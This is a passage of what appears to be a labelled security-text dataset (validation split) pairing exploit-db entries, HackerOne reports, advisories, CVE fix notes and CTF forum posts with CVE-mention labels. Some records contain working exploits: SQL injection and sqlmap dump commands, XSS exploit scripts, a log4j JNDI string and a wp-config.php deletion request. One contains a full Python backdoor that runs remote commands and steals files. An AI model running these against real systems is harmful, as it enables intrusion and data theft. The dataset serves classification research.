8- For manually get data of database insert the below payload to see the user of the database.\n payload: editid=-6%27union%20all%20select%201,user(),3--%20-\n\n# 9- Now to get all database data use below \"sqlmap\" command to fetch all the data.\n Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie=\"PHPSESSID=hub8pub9s5c1j18cva9594af3q\" --dump-all --batch", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "58d550be420ca2cb0039", "text": "if it doesnt appear that there is an alias make sure you are running the basic powershell and not “powershell ISE” https://devblogs.microsoft.com/scripting/understanding-the-six-powershell-profiles/", "source": "hackthebox", "timestamp": "2023-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "79c54f5bca2c6027a16a", "text": "OpenCart Cross-site Scripting\n\n[Severity: MEDIUM]\n\nOpenCart 3.0.3.3 allows remote authenticated users to conduct XSS attacks via a crafted filename in the users' image upload section because of a lack of entity encoding. NOTE: this issue exists because of an incomplete fix for CVE-2020-10596. \nThe vendor states \"this is not a massive issue as you are still required to be logged into the admin.\"", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "09c596457f5db3940a35", "text": "CVE: CVE-2022-0472\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in Packagist jsdecena/laracom prior to v2.0.9.'}]\n\nFix commit: Fix vulnerability report from hunter.dev", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "73290eb7fe2697662f55", "text": "Complete Newbie/Novice - Help Required Please :)\n\nHi All, Its my 2nd day on HTB and i’ve come unstuck (already) on ‘Dancing’ - Machine 3. I’m at the stage of accessing smbclient through - $ smbclient \\\\10.129.42.109\\WorkShares - but keep getting the following in response: Password for [WORKGROUP\\htb-********: do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND) P.S - I also keep getting the above message for ADMIN$ + C$. Can anyone help please. Thank you in advance!", "source": "hackthebox", "timestamp": "2023-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d5a59fe44e1c5eb873ac", "text": "Hi I’m stuck with the first question in the course around default credentials . I have modified the given script which takes in a csv file fine and I have used all combinations from the all technologies listed here: https://github.com/scadastrangelove/SCADAPASS/blob/master/scadapass.csv . I also believe that row 12 relates to the technology here. Where the question says, “Inspect the login page and perform a bruteforce attack. What is the valid username?” I’m taking the question to actually mean: do a bruteforce by hand, just trying a small set of credentials from the link above to deduce the username only ( the PW is not even relevant). Based on row 12 of the csv in the link above, this looks pretty simple; but doesn’t work. Presupposing I understand this all correctly, Would someone be so kind to tell me, What am I missing, please? …and put me out of my misery. Warm regards", "source": "hackthebox", "timestamp": "2023-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4bf91e8babb903c53da4", "text": "After learning subnetting and network protocols, learn each basic tool like nmap and wireshark. Use a virtual machine and Metasploitable (2 and 3) to learn Metasploit. Eventually try doing exercises on places like hackthebox.com . I use YouTube to watch thousands of videos on Linux, math, programming and network security.", "source": "parrotsec", "timestamp": "2022-04-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a57778a89b456e1b1646", "text": "JRuby denial of service via Hash Collision\n\n[Severity: MEDIUM]\n\nJRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3c7713f707661dddaa2c", "text": "Concurrent Execution using Shared Resource with Improper Synchronization in pyftpdlib\n\n[Severity: HIGH]\n\nRace condition in the FTPHandler class in ftpserver.py in pyftpdlib before 0.5.2 allows remote attackers to cause a denial of service (daemon outage) by establishing and then immediately closing a TCP connection, leading to the accept function having an unexpected value of None for the address, or an ECONNABORTED, EAGAIN, or EWOULDBLOCK error, a related issue to CVE-2010-3492.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b6099e43b35887cab169", "text": "CVE: CVE-2022-0156\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Use After Free'}]\n\nFix commit: patch 8.2.4040: keeping track of allocated lines is too complicated\n\nProblem: Keeping track of allocated lines in user functions is too\n complicated.\nSolution: Instead of freeing individual lines keep them all until the end.", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "cc92341925df7a611f58", "text": "[Use of Externally-Controlled Format String] ██████████ running a vulnerable log4j\n\n**Description:**\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://████████/███████https%3A%2F%2F█████████%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6bd700c420721056d933", "text": "I’m currently stuck on digging in, either i’m stupid or is has something to do with dig /dns enumeration, can anyone give me a small hint? and why i can readout the flag for overflown?", "source": "hackthebox", "timestamp": "2022-10-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "688d33773b1b889a66d8", "text": "Hi. It doesn’t concern Parrot but the tool you are using more. Did you compiled it and installed it correctly? Do some tests.", "source": "parrotsec", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8564ab3df3c28d85046a", "text": "HOW?!?! I’ve got the reverse shell - is it a priv escalation or is that not what they’re looking for? Is there a way to make the msfvenom payload “cat /root/flag.txt” instead of the reverse shell?", "source": "hackthebox", "timestamp": "2022-11-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "346e9c3ed01d323f790a", "text": "That sounds like a fantastic idea! Engaging with experienced CTF players will undoubtedly enhance your skills and expose you to different problem-solving approaches. Collaborating with them in CTF competitions can be a fun and educational experience. Good luck finding and connecting with those cool people! Enjoy the CTF challenges and happy hacking!", "source": "hackthebox", "timestamp": "2023-08-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c0b283e4d46a08844bfc", "text": "WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\n\n# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\n# Date: 21 Apr 2022\n# Exploit Author: cxosmo\n# Vendor Homepage: https://wso2.com\n# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/)\n# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;\n # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;\n # API Microgateway 2.2.0;\n # Data Analytics Server 3.2.0;\n # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;\n # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;\n # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;\n # Identity Server Analytics 5.5.0 and 5.6.0;\n # WSO2 Micro Integrator 1.0.0.\n# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)\n# CVE: CVE-2022-29548\n\nimport argparse\nimport logging\nimport urllib.parse\n\n# Global variables\nVULNERABLE_ENDPOINT = \"/carbon/admin/login.jsp?loginStatus=false&errorCode=\"\nDEFAULT_PAYLOAD = \"alert(document.domain)\"\n\n# Logging config\nlogging.basicConfig(level=logging.INFO, format=\"\")\nlog = logging.getLogger()\n\ndef generate_payload(url, custom_payload=False):\n log.info(f\"Generating payload for {url}...\")\n if custom_payload:\n log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//\")\n else:\n log.info(f\"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//\")\n\ndef clean_url_input(url):\n if url.count(\"/\") > 2:\n return f\"{url.split('/')[0]}//{url.split('/')[2]}\"\n else:\n return url\n\ndef check_payload(payload):\n encoded_characters = ['\"', '<', '>']\n if any(character in payload for character in encoded_characters):\n log.info(f\"Unsupported character(s) (\\\", <, >) found in payload.\")\n return False\n else:\n return urllib.parse.quote(payload)\n\nif __name__ == \"__main__\":\n # Parse command line\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)\n required_arguments = parser.add_argument_group('required arguments')\n required_arguments.add_argument(\"-t\", \"--target\",\n help=\"Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)\",\n required=\"True\", action=\"store\")\n parser.add_argument(\"-p\", \"--payload\",\n help=\"Use custom JavaScript for generated payload (Some characters (\\\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))\",\n action=\"store\", default=False)\n args = parser.parse_args()\n\n # Clean user target input\n args.target = clean_url_input(args.target.lower())\n\n # Check for unsupported characters in custom payload; URL-encode as required\n if args.payload:\n args.payload = check_payload(args.payload)\n if args.payload:\n generate_payload(args.target, args.payload)\n else:\n generate_payload(args.target)", "source": "exploitdb", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2c32bb255c945e9a4640", "text": "Withdrawn Advisory: ReDoS in py library when used with subversion \n\n[Severity: HIGH]\n\n### Withdrawn Advisory\nThis advisory has been withdrawn because evidence does not suggest that CVE-2022-42969 is a valid, reproducible vulnerability. This link is maintained to preserve external references.\n\n### Original Description\nThe py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.\n\nThe particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context.", "source": "github_advisory", "timestamp": "2022-10-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d898419dcfb849391a76", "text": "SQL injection question\n\nHey! I am searching for my first bug and have a question. If I try to inject SQL query i get “Access Denied” error: q2 736×34 5.46 KB But if i double encode this query it loads the page, but gives me non-empty result (my query “AND 2=1” should always be false) q1 1064×50 6.61 KB My question is - does this mean that there is an SQL injection and double encoding bypasses filter?", "source": "hackersploit", "timestamp": "2022-06-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "83dd2e078d46c6bf7203", "text": "CVE: CVE-2022-24772\n\n[{'lang': 'en', 'value': 'Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.'}]\n\nFix commit: Fix signature verification issues.\n\n**SECURITY**: Three RSA PKCS#1 v1.5 signature verification issues were\nreported by Moosa Yahyazadeh (moosa-yahyazadeh@uiowa.edu):\n\n- Leniency in checking `digestAlgorithm` structure can lead to signature\n forgery.\n - The code is lenient in checking the digest algorithm structure. This can\n allow a crafted structure that steals padding bytes and uses unchecked\n portion of the PKCS#1 encoded message to forge a signature when a low\n public exponent is being used.\n- Failing to check tailing garbage bytes can lead to signature forgery.\n - The code does not check for tailing garbage bytes after decoding a\n `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed\n and garbage data added to forge a signature when a low public exponent is\n being used.\n- Leniency in checking type octet.\n - `DigestInfo` is not properly checked for proper ASN.1 structure. This can\n lead to successful verification with signatures that contain invalid\n structures but a valid digest.\n\nFor more information, please see \"Bleichenbacher's RSA signature forgery based\non implementation error\" by Hal Finney:\nhttps://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/\n\nFixed with the following:\n\n- [asn1] `fromDer` is now more strict and will default to ensuring all\n input bytes are parsed or throw an error. A new option `parseAllBytes`\n can disable this behavior.\n - **NOTE**: The previous behavior is being changed since it can lead\n to security issues with crafted inputs. It is possible that code\n doing custom DER parsing may need to adapt to this new behavior and\n optional flag.\n- [rsa] Add and use a validator to check for proper structure of parsed\n ASN.1 `RSASSA-PKCS-v1_5` `DigestInfo` data. Additionally check that\n the hash algorithm identifier is a known value. An invalid\n `DigestInfo` or algorithm identifier will now cause an error to be\n thrown.\n- [oid] Added `1.2.840.113549.2.2` / `md2` for hash algorithm checking.\n- [tests] Tests were added for all of the reported issues. A private\n verify option was added to assist in checking multiple possible\n failures in the test data.", "source": "cvefixes", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e851d8383c7dc1170db9", "text": "CVE: CVE-2022-31082\n\n[{'lang': 'en', 'value': 'GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. glpi-inventory-plugin is a plugin for GLPI to handle inventory management. In affected versions a SQL injection can be made using package deployment tasks. This issue has been resolved in version 1.0.2. Users are advised to upgrade. Users unable to upgrade should delete the `front/deploypackage.public.php` file if they are not using the `deploy tasks` feature.'}]\n\nFix commit: Merge pull request from GHSA-q6m7-h6rj-5wmw", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6e8d945cc0d9dadffdbb", "text": "Getting started | privilege escalation | quick solve Step 6: use this command to view the /flag.txt file example; cat flag.txt Hi, I’ve got one question? have you ever tried this yourself? because this → “Step 6: use this command to view the /flag.txt fileexample; cat flag.txt” does not work. regards SORRY - DISREGARD PLEASE", "source": "hackthebox", "timestamp": "2023-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e91557c46bb31467bd53", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)\n\nThe following is from: https://hackerone.com/reports/1654310\n\nWhile building a PoC for CVE-2022-32209, I noticed that I could not fix my vulnerable application by updating https://github.com/rails/rails-html-sanitizer from 1.4.2 to 1.4.3 even though the Hackerone report about this vulnerability suggested that this should fix it (see here: https://hackerone.com/reports/1530898).\n\nI built this app with Rails 7.0.3.1 by just running \"rails new\", adding `config.action_view.sanitized_allowed_tags = [\"select\", \"style\"]` to the file `config/application.rb` and creating an endpoint that reflected a parameter after sanitizing it (ERB: `

    Hello <%= sanitize @name %>

    `). When using the payload `` for the parameter I got an alert no matter what the version of rails-html-sanitizer was.\n\nI believe the reason is the following. There are two ways you can pass the list of allowed tags to the sanitizer. One is via a list of tags stored in a class attribute, the other is via an argument passed into the `sanitize` method. The fix only considered the second way but the first one was forgotten. See the commit with the fix here: https://github.com/rails/rails-html-sanitizer/commit/c871aa4034d3d80ad67cf33a3462154b0a0fb477#diff-0daf33b9062eb5ccdeae86ed8bf2662a6e8669f1a7db590802b7f3b36ea47426R159\nThe relevant part of the code is this:\n\n```ruby\nmodule Rails\n module Html\n class SafeListSanitizer < Sanitizer\n ...\n def remove_safelist_tag_combinations(tags)\n if !loofah_using_html5? && tags.include?(\"select\") && tags.include?(\"style\")\n warn(\"WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'\")\n tags.delete(\"style\")\n end\n tags\n end\n\n def allowed_tags(options)\n if options[:tags]\n remove_safelist_tag_combinations(options[:tags])\n else\n self.class.allowed_tags\n end\n end\n ...\n end\n end\nend\n```\n\nMethod `remove_safelist_tag_combinations` is introduced to remove `style` from the allow list if `select` is in there. However, within method `allowed_tags` this cleanup is only applied to the tag list in the `options`, not to ` self.class.allowed_tags`, the list stored in the sanitizer class.\nHowever, it seems that the configuration in `config/application.rb` which I've set above put the list into the class variable (I've sprinkled a few `puts` here and there to confirm that).\n\nMoreover, when moving the allow list from `config/application.rb` into the ERB template\n(`

    Hello <%= sanitize @name, tags: [\"select\", \"style\"] %>

    `), the update from\n1.4.2 to 1.4.3 does fix the problem.\n\n## Impact\n\nIt is possible to bypass Rails::Html::SafeListSanitizer filtering and perform an XSS attack.", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2c3e9a73cc8cca3ed6b4", "text": "I will suggest you to use Tortoise Git, which has GUI. Once you have download and installed Tortoise Git, create new folder and then copy git clone url from repository, then, right-click inside new folder in local PC, select Tortoise-Git -> Select \"Clone here\" Pop-up will appear click \"Ok\" to clone repository, (enter your credentials of repository if another pop-up appears)", "source": "go4expert", "timestamp": "2022-05-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b2533b080df7dcee0ec9", "text": "CVE: CVE-2022-2636\n\n[{'lang': 'en', 'value': 'Improper Input Validation in GitHub repository hestiacp/hestiacp prior to 1.6.6.'}]\n\nFix commit: Fix security issues in v-add-web-domain-redirect + Sync up main with release (#2814)\n\n* Fix v-add-web-domain-redirect\r\n\r\n* Remove sudo permission admin group on new setups\r\n\r\nWe delete the group before install anyway\r\n\r\n* Block \"sudo\" from\r\n\r\n* Add missing slash\r\n\r\n* Update changelog\r\n\r\n* Update versions", "source": "cvefixes", "timestamp": "2022-08-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "440271450da77075707f", "text": "SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)\n\n#!/usr/bin/python3\n\n# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)\n# Google Dork: intitle:\"SCM Manager\" intext:1.60\n# Date: 05-25-2023\n# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)\n# Vendor Homepage: https://scm-manager.org/\n# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/\n# Version: 1.2 <= 1.60\n# Tested on: Debian based\n# CVE: CVE-2023-33829\n\n# Modules\nimport requests\nimport argparse\nimport sys\n\n# Main menu\nparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')\nparser.add_argument(\"-u\", \"--user\", help=\"Admin user or user with write permissions\")\nparser.add_argument(\"-p\", \"--password\", help=\"password of the user\")\nargs = parser.parse_args()\n\n\n# Credentials\nuser = sys.argv[2]\npassword = sys.argv[4]\n\n\n# Global Variables\nmain_url = \"http://localhost:8080/scm\" # Change URL if its necessary\nauth_url = main_url + \"/api/rest/authentication/login.json\"\nusers = main_url + \"/api/rest/users.json\"\ngroups = main_url + \"/api/rest/groups.json\"\nrepos = main_url + \"/api/rest/repositories.json\"\n\n# Create a session\nsession = requests.Session()\n\n# Credentials to send\npost_data={\n\t'username': user, # change if you have any other user with write permissions\n\t'password': password # change if you have any other user with write permissions\n}\n\nr = session.post(auth_url, data=post_data)\n\nif r.status_code == 200:\n\tprint(\"[+] Authentication successfully\")\nelse:\n\tprint(\"[-] Failed to authenticate\")\n\tsys.exit(1)\n\nnew_user={\n\n\t\"name\": \"newUser\",\n\t\"displayName\": \"\",\n\t\"mail\": \"\",\n\t\"password\": \"\",\n\t\"admin\": False,\n\t\"active\": True,\n\t\"type\": \"xml\"\n\n}\n\ncreate_user = session.post(users, json=new_user)\nprint(\"[+] User with XSS Payload created\")\n\nnew_group={\n\n\t\"name\": \"newGroup\",\n\t\"description\": \"\",\n\t\"type\": \"xml\"\n\n}\n\ncreate_group = session.post(groups, json=new_group)\nprint(\"[+] Group with XSS Payload created\")\n\nnew_repo={\n\n\t\"name\": \"newRepo\",\n\t\"type\": \"svn\",\n\t\"contact\": \"\",\n\t\"description\": \"\",\n\t\"public\": False\n\n}\n\ncreate_repo = session.post(repos, json=new_repo)\nprint(\"[+] Repository with XSS Payload created\")", "source": "exploitdb", "timestamp": "2023-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9f75861e55a4243a9e7f", "text": "What are the vulnerabilities of Windows 10\n\nits just a simple question …", "source": "hackersploit", "timestamp": "2022-08-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1fc8c76d3187d32bbe6a", "text": "I strongly advise against taking any retaliatory action against the scammer. This is not only unethical but also illegal and could result in serious consequences for you. Instead, you should report the scammer to the relevant authorities, such as the FBI's Internet Crime Complaint Center (IC3) or the Federal Trade Commission (FTC). You can also report the scammer to Craigslist, PayPal, and the shipping companies involved. It's important to remember that scammers use various tactics to trick and deceive people, and it's not your responsibility to teach them a lesson. Your priority should be to protect yourself and others by reporting the scam and preventing further harm. In the future, it's important to be cautious when dealing with online transactions and to always verify the legitimacy of the buyer or seller before engaging in any transactions.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7fc365d10488ec071df4", "text": "CVE: CVE-2022-31111\n\n[{'lang': 'en', 'value': \"Frontier is Substrate's Ethereum compatibility layer. In affected versions the truncation done when converting between EVM balance type and Substrate balance type was incorrectly implemented. This leads to possible discrepancy between appeared EVM transfer value and actual Substrate value transferred. It is recommended that an emergency upgrade to be planned and EVM execution temporarily paused in the mean time. The issue is patched in Frontier master branch commit fed5e0a9577c10bea021721e8c2c5c378e16bf66 and polkadot-v0.9.22 branch commit e3e427fa2e5d1200a784679f8015d4774cedc934. This vulnerability affects only EVM internal states, but not Substrate balance states or node. You can temporarily pause EVM execution (by setting up a Substrate `CallFilter` that disables `pallet-evm` and `pallet-ethereum` calls before the patch can be applied.\"}]\n\nFix commit: Limit number of iterations in genesis nonce building (#753)", "source": "cvefixes", "timestamp": "2022-07-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6c67a08aa34719fa18e8", "text": "[Missing Required Cryptographic Step] CVE-2022-30115: HSTS bypass via trailing dot\n\ncurl allows users to load a HSTS cache which will cause curl to use HTTPS instead of HTTP given a HTTP URL for a given site specified in the HSTS cache.\n\nIf the trailing dot is used, the HSTS check will be bypassed.\n\nIf a user has a preloaded hsts.txt:\n`````` \n# Your HSTS cache. https://curl.se/docs/hsts.html\n# This file was generated by libcurl! Edit at your own risk.\naccounts.google.com \"20230503 08:47:52\"\n`````` \n\nDoing the following:\n``````\ncurl --hsts hsts.txt http://accounts.google.com.\n``````\n\nWill cause accounts.google.com to be loaded over HTTP\n``````\n\n301 Moved\n

    301 Moved

    \nThe document has moved\nhere.\n\n``````\n\nThis issue has been raised in other HTTP clients before such as in https://bugs.chromium.org/p/chromium/issues/detail?id=461481 and https://www.mozilla.org/en-US/security/advisories/mfsa2015-13/\n\n## Impact\n\nHSTS bypass", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "78b8d11efbe6fc147467", "text": "The issue for you and for most from what I see is the dots in the counter. You’re using {1(3dots)28} while you should be using {1(2dots)28}. Made the same mistake.", "source": "hackthebox", "timestamp": "2022-10-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7bc52d06a2dc92a1efb3", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-05-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4601179737899ef2f07e", "text": "here is a python backdoor CLIENT: from socket import * import subprocess import os def connect(): server = socket(AF_INET, SOCK_STREAM) # server ip host = \"192.168.1.8\" port = 111 buffer_size = 1024 print(\"[+] Connecting to {}:{}\".format(host, port)) server.connect((host, port)) print(\"[+] Connected!\") while 1: command = server.recv(1024) command_decoded = command.decode(\"utf-8\") if \"terminate\" in command_decoded: print(\"[!] Connection closed!\") server.close() break elif \"steal\" in command_decoded: file_path = command_decoded.split(\">\") print(\"[+] Start!\") with open(file_path[1], \"rb\") as f: while True: file_bytes = f.read(buffer_size) if not file_bytes: break server.send(file_bytes) end = \"end-transfer-file\".encode(\"ISO-8859-1\") server.send(end) print(\"[+] End!\") else: CMD = subprocess.Popen(command_decoded, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) server.send(CMD.stdout.read()) def main(): connect() main() SERVER: from socket import * PWD = input(\"Where do you want to save your files stealed? \\nExample: /home/nonameon/Desktop/file\\nPath: \") def connect(): # TCP connection sock = socket(AF_INET, SOCK_STREAM) host = \"192.168.1.8\" port = 11 buffer_size = 1024 sock.bind((host, port)) sock.listen(1) while 1: print(\"[+] Listening {}:{}\".format(host, port), end=\"\") client, addr = sock.accept() print(\"\\n[+] Connection from: \", addr) print(\"[?] Use 'steal>' for get file or 'terminate' for close connection\") while 1: command = input(\"Shell> \") if \"terminate\" in command: client.send(\"terminate\".encode()) client.close() print(\"[+] Closed!\") print(\"[+] Listening {}:{}\".format(host, port), end=\"\") break else: #manda client.send(command.encode()) #riceve resp = client.recv(buffer_size) flag = True if \"steal\" in command: file_backdoor = PWD print(\"[+] Start!\") with open(file_backdoor, \"wb\") as f: while True: f.write(resp) resp = client.recv(buffer_size) if \"end-transfer-file\" in resp.decode(\"ISO-8859-1\"): break print(\"[+] End!\") else: print(resp.decode(\"ISO-8859-1\")) def main(): connect() main()", "source": "hackersploit", "timestamp": "2022-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0b2b45eed3b4f3ca0f08", "text": "ill have to look up what SHA sum is, but the drive will NOT down load in fat32 no matter how many times i try reformating it before i put it through rufus… is there any way to test the drive ,or is that more a matter of the brand?", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "741d4ad476de5f984802", "text": "WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)\n\n# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)\n# Date: 09-11-2021\n# Exploit Author: Ceylan Bozogullarindan\n# Exploit Website: https://bozogullarindan.com\n# Vendor Homepage: https://bestwebsoft.com/\n# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/\n# Version: 1.1.1\n# Tested on: Linux\n# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)\n\n\n# Description:\n\nError Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!\n\nI've especially emphasized \"clearing a log file\" statement because the feature of \"clearing a log file\" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is \"rrrlgvwr_clear_file_name\". It can be manipulated only authenticated users.\n\nAn attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.\n\n# Steps To Reproduce\n\n1. Install and activate the plugin.\n2. Click the \"Log Monitor\" available under Error Log Viewer menu item.\n3. Choose a log file to clear.\n4. Intercept the request via Burp or any other local proxy tool.\n5. Replace the value of the parameter \"rrrlgvwr_clear_file_name\" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.\n6. Check the content of the cleared file. You will see that the file is empty.\n\n\n# PoC - Supported Materials\n\n---------------------------------------------------------------------------\nPOST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1\nHost: 127.0.0.1:8000\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 603\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: [admin+]\n\nrrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php\n---------------------------------------------------------------------------", "source": "exploitdb", "timestamp": "2022-02-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1b3e6dd15c344b356911", "text": "CVE: CVE-2022-1720\n\n[{'lang': 'en', 'value': 'Buffer Over-read in function grab_file_name in GitHub repository vim/vim prior to 8.2.4956. This vulnerability is capable of crashing the software, memory modification, and possible remote execution.'}]\n\nFix commit: patch 8.2.4956: reading past end of line with \"gf\" in Visual block mode\n\nProblem: Reading past end of line with \"gf\" in Visual block mode.\nSolution: Do not include the NUL in the length.", "source": "cvefixes", "timestamp": "2022-06-20", "split": 